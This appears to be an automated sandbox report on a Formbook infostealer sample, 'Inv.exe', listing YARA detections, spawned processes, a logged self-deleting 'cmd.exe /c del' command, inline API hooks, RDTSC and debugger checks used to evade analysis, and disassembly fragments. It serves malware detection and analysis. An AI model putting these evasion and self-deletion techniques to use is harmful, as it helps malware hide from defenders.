          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@8/0@7/3
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Users\user\Desktop\Inv.exe, Command line argument: Kernel32.dll, 0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exe, Command line argument: User32.dll, 0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exe, Command line argument: IEUCIZEO, 0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exe, Command line argument: Kernel32.dll, 1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exe, Command line argument: User32.dll, 1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exe, Command line argument: IEUCIZEO, 1_2_01231040
          Source: Inv.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Inv.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: Inv.exe, Virustotal: Detection: 39%
          Source: Inv.exe, ReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\Inv.exe, File read: C:\Users\user\Desktop\Inv.exe
          Source: unknown, Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknown, Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknown, Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Inv.exe, Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: Inv.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Inv.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Inv.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Inv.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Inv.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Inv.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 0_2_012391A5 push ecx; ret 0_2_012391B8
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0041D0D2 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0041D0DB push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0041D085 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0041D13C push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0041D1EF push ebp; ret 1_2_0041D6FD
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0040F345 push edi; retf 1_2_0040F34C
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0041E7C6 push edx; ret 1_2_0041E83E
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_012391A5 push ecx; ret 1_2_012391B8
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0199D0D1 push ecx; ret 1_2_0199D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_02E6D0D1 push ecx; ret 4_2_02E6D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_0036D085 push eax; ret 4_2_0036D0D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_0036D0D2 push eax; ret 4_2_0036D0D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_0036D0DB push eax; ret 4_2_0036D142
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_0036D13C push eax; ret 4_2_0036D142
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_0036D1EF push ebp; ret 4_2_0036D6FD
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_0036DA9F push cs; iretd 4_2_0036DAAE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_0035F345 push edi; retf 4_2_0035F34C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4_2_0036E7C6 push edx; ret 4_2_0036E83E

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe, User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Inv.exe, RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exe, RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, RDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, RDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6700, Thread sleep count: 65 > 30
          Source: C:\Windows\explorer.exe TID: 6700, Thread sleep time: -130000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576, Thread sleep count: 43 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576, Thread sleep time: -86000s >= -30000s
          Source: C:\Windows\explorer.exe, Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.686106576.0000000006650000.00000004.00000001.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1056063670.0000000004710000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.690969786.000000000A784000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Inv.exe, Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Inv.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process queried: DebugPort
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\Inv.exe, Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194AD30 mov eax, dword ptr fs:[00000030h]1_2_0194AD30
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019CA537 mov eax, dword ptr fs:[00000030h]1_2_019CA537
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]1_2_01974D3B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]1_2_01974D3B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]1_2_01974D3B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01967D50 mov eax, dword ptr fs:[00000030h]1_2_01967D50
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01983D43 mov eax, dword ptr fs:[00000030h]1_2_01983D43
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C3540 mov eax, dword ptr fs:[00000030h]1_2_019C3540
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h]1_2_0196C577
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h]1_2_0196C577
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195849B mov eax, dword ptr fs:[00000030h]1_2_0195849B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A014FB mov eax, dword ptr fs:[00000030h]1_2_01A014FB
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]1_2_019C6CF0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]1_2_019C6CF0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]1_2_019C6CF0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18CD6 mov eax, dword ptr fs:[00000030h]1_2_01A18CD6
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]1_2_019C6C0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]1_2_019C6C0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]1_2_019C6C0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]1_2_019C6C0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]1_2_01A1740D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]1_2_01A1740D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]1_2_01A1740D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197BC2C mov eax, dword ptr fs:[00000030h]1_2_0197BC2C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h]1_2_019DC450
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h]1_2_019DC450
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A44B mov eax, dword ptr fs:[00000030h]1_2_0197A44B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196746D mov eax, dword ptr fs:[00000030h]1_2_0196746D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01958794 mov eax, dword ptr fs:[00000030h]1_2_01958794
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]1_2_019C7794
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]1_2_019C7794
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]1_2_019C7794
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019837F5 mov eax, dword ptr fs:[00000030h]1_2_019837F5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196F716 mov eax, dword ptr fs:[00000030h]1_2_0196F716
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h]1_2_019DFF10
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h]1_2_019DFF10
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h]1_2_0197A70E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h]1_2_0197A70E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197E730 mov eax, dword ptr fs:[00000030h]1_2_0197E730
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h]1_2_01A1070D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h]1_2_01A1070D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h]1_2_01944F2E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h]1_2_01944F2E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18F6A mov eax, dword ptr fs:[00000030h]1_2_01A18F6A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195EF40 mov eax, dword ptr fs:[00000030h]1_2_0195EF40
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195FF60 mov eax, dword ptr fs:[00000030h]1_2_0195FF60
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]1_2_01A10EA5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]1_2_01A10EA5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]1_2_01A10EA5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFE87 mov eax, dword ptr fs:[00000030h]1_2_019DFE87
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C46A7 mov eax, dword ptr fs:[00000030h]1_2_019C46A7
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019736CC mov eax, dword ptr fs:[00000030h]1_2_019736CC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FFEC0 mov eax, dword ptr fs:[00000030h]1_2_019FFEC0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01988EC7 mov eax, dword ptr fs:[00000030h]1_2_01988EC7
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019716E0 mov ecx, dword ptr fs:[00000030h]1_2_019716E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18ED6 mov eax, dword ptr fs:[00000030h]1_2_01A18ED6
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019576E2 mov eax, dword ptr fs:[00000030h]1_2_019576E2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h]1_2_0197A61C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h]1_2_0197A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]4_2_02E1C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]4_2_02E1C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]4_2_02E1C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E48E00 mov eax, dword ptr fs:[00000030h]4_2_02E48E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1608 mov eax, dword ptr fs:[00000030h]4_2_02ED1608
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h]4_2_02E4A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h]4_2_02E4A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E537F5 mov eax, dword ptr fs:[00000030h]4_2_02E537F5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E28794 mov eax, dword ptr fs:[00000030h]4_2_02E28794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]4_2_02E97794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]4_2_02E97794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]4_2_02E97794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2FF60 mov eax, dword ptr fs:[00000030h]4_2_02E2FF60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8F6A mov eax, dword ptr fs:[00000030h]4_2_02EE8F6A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2EF40 mov eax, dword ptr fs:[00000030h]4_2_02E2EF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h]4_2_02E14F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h]4_2_02E14F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4E730 mov eax, dword ptr fs:[00000030h]4_2_02E4E730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h]4_2_02EE070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h]4_2_02EE070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h]4_2_02E4A70E
